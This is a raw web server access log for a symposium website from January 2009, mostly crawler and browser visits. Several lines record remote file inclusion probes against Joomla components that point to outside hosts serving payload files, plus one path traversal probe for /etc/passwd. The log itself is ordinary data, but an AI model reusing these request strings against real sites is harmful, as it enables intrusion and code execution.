208.80.194.52 - - [24/Jan/2009:20:34:31 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; FDM)" 0 www.geil-symposium.com
208.111.154.16 - - [24/Jan/2009:22:21:27 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [24/Jan/2009:22:21:27 -0500] "GET /publications.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [25/Jan/2009:02:32:51 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [25/Jan/2009:02:32:51 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [25/Jan/2009:04:48:16 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [25/Jan/2009:04:48:17 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
66.235.124.38 - - [25/Jan/2009:08:35:48 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [25/Jan/2009:08:35:48 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
208.80.194.47 - - [25/Jan/2009:09:41:12 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
131.107.0.111 - - [25/Jan/2009:11:31:53 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
193.47.80.36 - - [25/Jan/2009:18:19:29 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
193.47.80.36 - - [25/Jan/2009:18:19:29 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
208.80.194.52 - - [25/Jan/2009:20:49:16 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR Enabled; SIMBAR={1063EB05-8CAE-4922-B31B-9D244C33AD31}; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
218.234.18.127 - - [26/Jan/2009:01:54:52 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kadin.or.id/mail/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" 0 www.geil-symposium.com
218.234.18.127 - - [26/Jan/2009:01:54:52 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kadin.or.id/mail/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" 0 www.geil-symposium.com
208.111.154.15 - - [26/Jan/2009:02:24:15 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [26/Jan/2009:02:24:15 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [26/Jan/2009:03:13:59 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [26/Jan/2009:03:13:59 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [26/Jan/2009:07:53:59 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [26/Jan/2009:07:53:59 -0500] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [26/Jan/2009:07:54:00 -0500] "GET /logs/ HTTP/1.1" 200 450 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.80.194.32 - - [26/Jan/2009:10:19:35 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; InfoPath.1; Windows-Media-Player/10.00.00.3990)" 0 www.geil-symposium.com
74.6.17.166 - - [26/Jan/2009:10:29:43 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.17.166 - - [26/Jan/2009:10:29:48 -0500] "GET /logs/error.log HTTP/1.0" 200 272214 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 1 www.geil-symposium.com
65.55.209.25 - - [26/Jan/2009:10:52:38 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" 0 www.geil-symposium.com
65.55.209.25 - - [26/Jan/2009:10:52:38 -0500] "GET / HTTP/1.1" 200 326 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" 0 www.geil-symposium.com
74.6.17.166 - - [26/Jan/2009:11:26:20 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.17.166 - - [26/Jan/2009:11:51:26 -0500] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.17.166 - - [26/Jan/2009:11:51:28 -0500] "GET /logs/ HTTP/1.0" 200 438 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.111.154.16 - - [26/Jan/2009:16:38:22 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
67.205.7.217 - - [26/Jan/2009:18:04:47 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.shelbyminitrucks.com/dlk/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" 0 www.geil-symposium.com
67.205.7.217 - - [26/Jan/2009:18:04:47 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.shelbyminitrucks.com/dlk/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" 0 www.geil-symposium.com
67.205.7.217 - - [26/Jan/2009:18:04:47 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.shelbyminitrucks.com/dlk/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" 0 www.geil-symposium.com
38.100.8.50 - - [26/Jan/2009:20:08:32 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "panscient.com" 0 www.geil-symposium.com
38.100.8.50 - - [26/Jan/2009:20:08:32 -0500] "GET / HTTP/1.1" 200 326 "-" "panscient.com" 0 www.geil-symposium.com
38.100.8.50 - - [26/Jan/2009:20:08:32 -0500] "GET /accommodations.html HTTP/1.1" 404 - "-" "panscient.com" 0 www.geil-symposium.com
38.100.8.50 - - [26/Jan/2009:20:08:35 -0500] "GET /logs HTTP/1.1" 301 343 "-" "panscient.com" 0 www.geil-symposium.com
38.100.8.50 - - [26/Jan/2009:20:08:35 -0500] "GET /logs/ HTTP/1.1" 200 450 "-" "panscient.com" 0 www.geil-symposium.com
38.100.8.50 - - [26/Jan/2009:20:08:36 -0500] "GET /Scholarship.html HTTP/1.1" 404 - "-" "panscient.com" 0 www.geil-symposium.com
38.100.8.50 - - [26/Jan/2009:20:08:37 -0500] "GET /logs HTTP/1.1" 301 343 "-" "panscient.com" 0 www.geil-symposium.com
38.100.8.50 - - [26/Jan/2009:20:08:37 -0500] "GET /logs/ HTTP/1.1" 200 450 "-" "panscient.com" 0 www.geil-symposium.com
193.47.80.36 - - [26/Jan/2009:21:14:43 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
193.47.80.36 - - [26/Jan/2009:21:14:43 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
208.80.194.43 - - [26/Jan/2009:22:12:22 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; OptusNetDUI6)" 0 www.geil-symposium.com
66.235.124.38 - - [27/Jan/2009:04:42:14 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [27/Jan/2009:04:42:14 -0500] "GET /transportation.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
208.111.154.15 - - [27/Jan/2009:05:40:11 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [27/Jan/2009:05:40:11 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
64.246.165.170 - - [27/Jan/2009:09:13:11 -0500] "GET /robots.txt HTTP/1.0" 404 - "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
64.246.165.170 - - [27/Jan/2009:09:13:11 -0500] "GET / HTTP/1.1" 200 326 "http://whois.domaintools.com/geil-symposium.com" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
58.61.164.40 - - [27/Jan/2009:10:18:18 -0500] "GET /robots.txt HTTP/1.1" 404 - "http://www.geil-symposium.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
208.80.194.33 - - [27/Jan/2009:11:13:42 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {6BD83A3A-9E07-427C-A432-4BD655A9489B}; FunWebProducts; SpamBlockerUtility 4.8.4)" 0 www.geil-symposium.com
66.235.124.38 - - [27/Jan/2009:17:57:35 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [27/Jan/2009:17:57:35 -0500] "GET /Scholarship.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.249.71.88 - - [27/Jan/2009:18:32:07 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.88 - - [27/Jan/2009:18:32:07 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
217.216.104.248 - - [27/Jan/2009:18:45:22 -0500] "GET /logs/access.log HTTP/1.0" 200 409968 "-" "Wget/1.10.2" 1 www.geil-symposium.com
208.111.154.16 - - [27/Jan/2009:18:58:05 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.80.194.36 - - [27/Jan/2009:22:44:37 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; snprtz|dialno)" 0 www.geil-symposium.com
72.30.142.164 - - [28/Jan/2009:03:37:29 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.142.164 - - [28/Jan/2009:03:37:30 -0500] "GET /logs HTTP/1.0" 301 323 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.142.164 - - [28/Jan/2009:03:37:30 -0500] "GET /logs/ HTTP/1.0" 200 434 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
66.235.124.38 - - [28/Jan/2009:06:52:25 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [28/Jan/2009:06:52:25 -0500] "GET /Sponsors.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
208.111.154.15 - - [28/Jan/2009:07:19:48 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [28/Jan/2009:07:19:48 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
61.135.249.209 - - [28/Jan/2009:09:45:14 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" 0 www.geil-symposium.com
61.135.249.209 - - [28/Jan/2009:09:45:14 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" 0 www.geil-symposium.com
208.111.154.15 - - [28/Jan/2009:12:19:22 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [28/Jan/2009:12:19:23 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.80.194.52 - - [28/Jan/2009:12:28:28 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {4EB13121-6963-4D18-B470-6D20C8ED84A3}; Roadrunner; snprtz|T04714137801828; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
65.55.209.25 - - [28/Jan/2009:15:04:53 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" 0 www.geil-symposium.com
65.55.209.25 - - [28/Jan/2009:15:04:54 -0500] "GET / HTTP/1.1" 200 326 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" 0 www.geil-symposium.com
208.80.194.45 - - [28/Jan/2009:15:34:34 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; yplus 5.6.04b)" 0 www.geil-symposium.com
38.99.13.124 - - [28/Jan/2009:15:56:54 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
114.111.36.26 - - [28/Jan/2009:17:26:16 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)" 0 www.geil-symposium.com
114.111.36.26 - - [28/Jan/2009:17:26:36 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)" 0 www.geil-symposium.com
64.56.65.37 - - [28/Jan/2009:22:19:00 -0500] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
64.56.65.37 - - [28/Jan/2009:22:19:00 -0500] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
64.56.65.37 - - [28/Jan/2009:22:19:00 -0500] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
208.111.154.15 - - [28/Jan/2009:23:04:40 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [28/Jan/2009:23:04:40 -0500] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [28/Jan/2009:23:04:42 -0500] "GET /logs/ HTTP/1.1" 200 450 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [28/Jan/2009:23:13:32 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
203.209.252.10 - - [29/Jan/2009:01:27:08 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.160.178.101 - - [29/Jan/2009:01:27:33 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
193.47.80.36 - - [29/Jan/2009:02:13:05 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
193.47.80.36 - - [29/Jan/2009:02:13:05 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
38.105.83.13 - - [29/Jan/2009:09:29:59 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" 0 www.geil-symposium.com
38.105.83.13 - - [29/Jan/2009:09:31:02 -0500] "GET /logs HTTP/1.1" 301 343 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" 0 www.geil-symposium.com
38.105.83.13 - - [29/Jan/2009:09:32:25 -0500] "GET /logs/ HTTP/1.1" 200 450 "http://www.geil-symposium.com/logs" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" 0 www.geil-symposium.com
38.105.83.13 - - [29/Jan/2009:09:33:47 -0500] "GET /logs/error.log HTTP/1.1" 200 27321 "http://www.geil-symposium.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" 0 www.geil-symposium.com
38.105.83.13 - - [29/Jan/2009:09:33:51 -0500] "GET /logs/access.log HTTP/1.1" 200 42501 "http://www.geil-symposium.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" 0 www.geil-symposium.com
77.221.130.16 - - [29/Jan/2009:10:31:08 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://madrigaldelavera.es/joomla/mambots/editors/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
77.221.130.16 - - [29/Jan/2009:10:31:08 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://madrigaldelavera.es/joomla/mambots/editors/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
208.111.154.16 - - [29/Jan/2009:11:14:55 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.80.194.35 - - [29/Jan/2009:13:18:11 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; snprtz|T19138700001462|73010104# #1#4#90)" 0 www.geil-symposium.com
88.119.247.27 - - [29/Jan/2009:20:22:32 -0500] "GET /Registration.html HTTP/1.0" 404 - "http://www.geil-symposium.com/Registration.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" 0 www.geil-symposium.com
208.80.194.56 - - [29/Jan/2009:22:08:51 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; CDSource=v11c.01; SV1; FunWebProducts; YPC 3.2.0; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
72.30.142.164 - - [30/Jan/2009:00:23:12 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.142.164 - - [30/Jan/2009:00:23:13 -0500] "GET /logs/access.log.20081202.gz HTTP/1.0" 200 52932 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.111.154.15 - - [30/Jan/2009:02:52:31 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [30/Jan/2009:02:52:31 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
174.133.39.178 - - [30/Jan/2009:03:28:20 -0500] "GET / HTTP/1.1" 200 322 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" 0 www.geil-symposium.com
208.111.154.16 - - [30/Jan/2009:04:32:13 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [30/Jan/2009:04:32:13 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
72.30.142.164 - - [30/Jan/2009:07:58:15 -0500] "GET /logs/error.log HTTP/1.0" 200 280576 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.185 - - [30/Jan/2009:10:18:46 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.185 - - [30/Jan/2009:10:18:47 -0500] "GET /logs/error.log HTTP/1.0" 200 280815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
87.106.16.155 - - [30/Jan/2009:12:57:18 -0500] "GET /logs/error.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
87.106.16.155 - - [30/Jan/2009:12:57:19 -0500] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
87.106.16.155 - - [30/Jan/2009:12:57:19 -0500] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
87.106.16.155 - - [30/Jan/2009:12:57:30 -0500] "GET /logs/error.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
87.106.16.155 - - [30/Jan/2009:12:57:30 -0500] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
87.106.16.155 - - [30/Jan/2009:12:57:31 -0500] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
87.106.16.155 - - [30/Jan/2009:13:32:19 -0500] "GET /logs/access.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
87.106.16.155 - - [30/Jan/2009:13:36:44 -0500] "GET /logs/access.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
208.80.194.44 - - [30/Jan/2009:16:45:46 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {CD1ECED2-110E-4825-981B-9D2A52AFFAB7}; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
82.161.231.16 - - [31/Jan/2009:10:57:34 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/2.0 (compatible; MSIE 3.0B; Windows NT)" 0 www.geil-symposium.com
38.99.13.124 - - [31/Jan/2009:12:52:10 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
72.30.142.164 - - [31/Jan/2009:14:16:28 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.142.164 - - [31/Jan/2009:14:16:28 -0500] "GET /logs/access.log HTTP/1.0" 200 423329 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.32.209.74 - - [31/Jan/2009:15:27:11 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
